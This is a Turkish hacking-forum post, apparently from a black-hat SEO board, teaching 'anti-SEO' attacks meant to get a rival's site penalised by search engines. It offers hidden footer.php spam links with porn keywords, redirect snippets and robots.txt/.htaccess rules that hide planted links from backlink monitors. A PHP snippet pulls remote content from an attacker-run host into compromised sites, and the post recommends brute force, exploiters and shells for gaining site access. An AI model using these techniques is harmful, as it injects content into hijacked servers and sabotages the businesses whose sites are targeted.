Neler yeni

Döküman Anti Seo "Spam link & 301" Etap-1 (1 Viewer)

daykoTR

Hack 'i Şeytanlar Yapar Melekler Değil
kidemli152
Mesajlar
51
Credits
49
? Merhaba İmhaTimi Ailesi ?
Öncelikle istek üzerine kırmayıp Black Hat Seo kategorisine onay veren yönetimdeki dostlara selam olsun hepsine ayrı ayrı teşekkür ederim ?. Açılmasını istedikten sonra real hayatımdaki sıkıntılardan dolayı aktif olamadım kusurumuz af ola elimden geldiğince Black Hat Seo alanında bilgimi paylaşacağım hadi başlayalım ?.

Spam link ("Çöp Link") Bilgilendirme.
Şimdi arkadaşlar anti seo 'da halk arasında çöp link kasmak, spam kelimeler yahut cezalı siteler üzerinden hedef sitemize sanki normal bir siteden backlink alıyormuş gibi gözüken bir çeşit saldırı türüdür spam link. Her arama motoru örneğin Google amca bir siteyi tararken çeşitli yapay zekalar tarafından yönetilen örümcek botlar siteyi <html> - </html> arasında bulunan her olguyu özenle bünyesinde bulunan çeşitli servislere ekler örneğin arama dizini gibi. Hiç duraksama olmaksızın örümcek botlar bir siteyi veya sayfayı sadece bir kez tarayıp bırakmaz sitenin her bir sayfasında yapılan en küçük güncellemeler bile milyarlarca siteyi her saniye tarayan botlar bir site 'deki reklamları, backlinkleri, hatta görsel ve içeriklerin çalınma durumu aynı zamanda dolandırıcı ve malware yayılımı gibi aklınıza gelebilecek daha bir çok şekilde kontrol eder ve gereken işlemleri yapar. Şimdi size bu kadar detaya neden girdim onu anlatmak istiyorum. Yılların bana verdiği birikimin öğrettiği şey bir sitenin Da, Pa, Alexa veya her hangi bir seo açısından önemli bir Rank 'ın üzerinden saldırı yapacağım o sitenin çöp veya gereksiz olduğunu tanımlamada yanlış seçim olduğudur. Daha önce bana verilen işlerde bu şekilde ayırıp çöp olarak saldırı panelime yerleştirdiğim 3.000 küsur sitenin hedefi spam 'a yada cezaya sokmasını beklerken istemeden 1'inci sıraya hedefi otoriter biçimde kenetledi. Yani kısaca hedef siteye istemeden büyük bir iyilik yapmış oldum :cautious:.
Bir kaç kez daha aynı şey başıma geldikten sonra derinlemesine incelemelerimde hedef sitenin yayın süresi ve seo uzmanının becerisi bir tarafa.
Saldırı çıkışı yaptığım siteler seo değerli düşük veya yok olması, spam kelimelere backlink eklenmesi eğer sitenin çalışması sağlam başında ise uzman biri varsa daha sonra kaldırsam bile karşı tarafa yarar sağlamıştır. Bu yüzden saldırı çıkışı yapacağınız siteleri https://websiteseochecker.com/spam-score-checker/ bu ve buna benzer adreslerden check edip SS ('Spam Score') değerine göre seçin. Anti seo saldırıları ne sızmaya nede ddos 'a benzer kendiniz için yaptığınız çalışmalarda kendi kafanıza sıkarsınız.

Spam link ("Çöp Link") Uygulama.
Backlink kullanırken çeşitli tanımlar kullanırız bunlardan bir kaç tanesi sırasıyla şu şekildedir.
  1. (rel="dofollow").
  2. (rel="nofollow").
  3. (rel="friend").
  4. (rel="muse").
  5. (rel="sponsor").
Saldırı yaparken ben dahil olmak üzere çoğunluk nofollow etiketi kullanılmaktadır tabi bu durum hedefe göre değişir nofollow 'un kabaca anlamı bir URL 'nin kullanılması gereken durumlarda örümcek botlara ben bu bağlantıya referans diğer bir deyiş ile kefil değilim demektir. Saldırı yapıldığı zaman genel olarak şimdi burada tam yazamıyorum ("Child ****") gibi spam kelimeler yada hedefin zarar görmesi beklenen anahtar kelimenin ("İstanbul evden eve nakliyat") vs yüzlerce sitenin her bir sayfasına backlink eklenip sonrasında diyelim 200 sayfası var o siteden 200 kere backlink yollanması sonucu site cezaya düşer. Saldırganın bilgisine göre saldırı yapılan siteler ne kadar hızlı arama motoruna indexlenirse 3 ila 5 gün içerisinde eklenen linklerin kalkmasıyla hedef site spam 'a düşer.
Örnek olarak bir kod parçası genel olarak sitenin her sayfasından faydalanmak için footer.php
HTML:
<font style="overflow: auto; position: fixed; height: 0pt; width: 0pt">
    <a href="https://www.hedef.com/" rel="nofollow" title="c** porn">c** porn</a> -
    <a href="https://www.hedef.com/" rel="nofollow" title="fuck google">fuck google</a> -
    <a href="https://www.hedef.com/" rel="nofollow" title="a de agzini kapat">a de agzini kapat</a> -
</font>

Yönlendirme ("301,302") Bilgilendirme ve Uygulama.
Şimdi arkadaşlar hepimiz HTTP durum kodlarını az çok biliriz en çok bilinen mesela 200,404, ve lanet olası 403 şeklinde uzar gider :cry:. Bu durumun seo dünyasındaki açıklaması diyelim 'ki her hangi bir sebepten değiştirmek veya bırakmak zorunda olduğunuz alan adınızdaki seo çalışmanızı kaybetmek istememektir. Sıkılmış veya bırakmak zorunda olduğunuz http://www.eski-site.com/ adresini http://www.yeni-site.com/ 'a kalıcı (301) yada geçici (302) şeklinde aktarıp yönlendirirsiniz. Benim genel tercihim 301 yönlendirmesi oluyor saldırı yaparken atak için örnek kodları şu şekildedir.
HTML & Javascript & PHP % .htaccess
HTML:
<html>
// HTML versiyon
<meta http-equiv="refresh" content="0; url=http://www.hedef-site.com/">
</html>
======================
 // Javascript versiyon
<script>
window.location.replace("http://www.hedef-site.com/");
</script>
======================
// HTACCESS versiyon
Redirect 301 / http://www.hedef-site.com/
======================
//PHP versiyon
<?php
header("Location: http://www.hedef-site.com/", true, 301);
exit();
?>

Bu kodları ihtiyacınıza göre geliştirerek amacınıza ulaşabilirsiniz her şey hayal gücünüze kalmış :) ve kendinize göre mutlaka bir panel ayarlamak en büyük ihtiyacınızdır. Aşağıda size bir örnek verdim.
FireShot Capture 011 - Cloud Shell - shell.cloud.google.com.png
Önemli ip uçları ve tavsiyeler.
Şimdi arkadaşlar size tavsiye, ip ucu vermeden aklınızda olmuş olabileceğini tahmin ettiğim soruları cevaplandırayım
1-) Saldırmak için site nasıl çıkarabilirim ?.
* Her kesin tıkandığı problem budur aslında bu soruyu ben ilk zamanlarımda çözmek için aklıma ilk gelen hazır exploiter, brute force gibi şeyler oldu. Web dizinine erişim kazanılmış siteler tabi 'ki en doğrusudur böyle bir imkanınız var ise mutlaka kullanın. Şayet bu tarz bilgi yada imkana el verişli değilseniz CMS Comment Submitter("Kısaca yorum botu"), Profil & Ziyaretçi defteri backlinker, Soysal imleme gibi botlardan faydalanmak zorundasınız size Wordpress ve Blooger için 2 adet ayrı yorum botu sunacağım ama bu ayrı bir post 'un konusu ?.
2-) Saldırı tespit, engelleme ve gizlemek mümkün 'mü ?.
* Şimdi canlar her Siber saldırı gibi tabi 'ki anti seo atakları 'da tespit edilebilir ve engellenebilir. Tespit ve engelleme bu postun konusu olmadığı için ben gizlemekten bahsedeceğim. Sizlere saldırmak için örnek olarak vermiş olduğum yukarıdaki kodlar tek başına çok kolay fark edilmektedir. Bir siteye giden her referans arama motorları tarafından webmaster tools gibi panellerde çıkar. Kısacası bunu google bot 'dan saklayamazsınız o görmez ise bir anlamı olmaz. Backlink monitor araçları vardır Ahrefs, Sumrush, Moz, vs gibi. Sizin en büyük düşmanınız bu araçlardır bu servisler google botlarından çok daha kısa süre içerisinde linkleri tespit eder ve bildirir. Bu servislere ait botları saldırı çıkışı yapacağınız sitelerin .htaccess, robots.txt ve php yada html alanlarına karışarak durdurabilirsiniz. Sizler için aşağıda örnek kodlar vereceğim ama lütfen hayal gücünüzü 'de kullanmayı ihmal etmeyin.
3-) Yaptığım saldırıyı nasıl hızlandırabilirim ?.
* Ben bu hususta bu işte gelişmeye çalıştığım dönemlerde shell log, server root, yani kısaca bir şekilde elime geçen siteleri file_get_content mantığında footer.php, header.php gibi sayfalara kod ekleyerek bir kolaylık sağlamıştım. Sonra bu siteleri bir text dosyasına lister mass ping araçları ile arama motorlarına pinglerdim. Bu işlem biraz bana hız kazandırdı ama yeterli değildi. Bu konuda size tavsiyem diyelim 'ki elinizde saldırı yapabileceğiniz 100 adet site bulunmakta içlerinden en fazla index 'a sahip olanların webmaster tools panellerine kendizi yönetici ekleyin ve getir işlemi yapın. Google amcada bunu bir çok kişi google gibi getir olarak bilmektedir bu işlem aynı gün etki etmeye başlar. Benim kendime ait olan panelimden hemen yukarıda size göstermiş resme bakın ben saldırı yaparken sitelerin konularına kod ekletip eklenen sayfayı hemen pingletiyorum. Yaptığımın google gibi getir işleminden farkı normalde saldırı çıktığım siteleri sadece ana sayfasına ping yollayarak botun tüm siteyi taramasını bekliyordum. Bu versiyonda kod eklettiğim sitenin her içeriğini bildiriyorum.
Bir sonraki konuda görüşmek üzere elimden geldiği, zamanımın yettiği kadar sizlere bildiklerimi uygulamalı olarak gösterdim mikrofonum olmadığından dolayı video 'lu anlatımlar yapamıyorum inşallah bir süre sonra videolu olarak göstereceğim. Aşağıda eğer panel veya bot kodlama yada temin etme imkanı olmayan arkadaşlar sizler için file_get_contents ve curl ile küçük bir örnek bırakıyorum allaha emanet :).

Backlink explorer araçlarını engellemek.
Kod:
============================
# robots.txt eklenecek
User-agent: Rogerbot
User-agent: Exabot
User-agent: MJ12bot
User-agent: Dotbot
User-agent: Gigabot
User-agent: AhrefsBot
User-agent: SemrushBot
User-agent: SemrushBot-SA
Disallow: /
============================
Html olarak <head></head> arası tercih edilir.
<meta name="AhrefsBot" content="noindex">
============================
.htaccess
# Htaccess uzerine eklenir
RewriteCond %{HTTP_USER_AGENT} ^AhrefsBot [NC,OR]
RewriteRule ^.* - [F,L]

Tüm liste : https://paste.ubuntu.com/p/vCCYZhR7Bd/

PHP:
<?php
$veri = file_get_contents("http://www.saldiri-kodu.tk/cek.txt");
echo $veri;
?>




 

daykoTR

Hack 'i Şeytanlar Yapar Melekler Değil
kidemli152
Mesajlar
51
Credits
49
Hacklink Black Hat Seo zaten 'de tabiki onlarada deyineceğim sözüm vardı ondan böyle başladım
 

Bu konuyu görüntüleyen kullanıcılar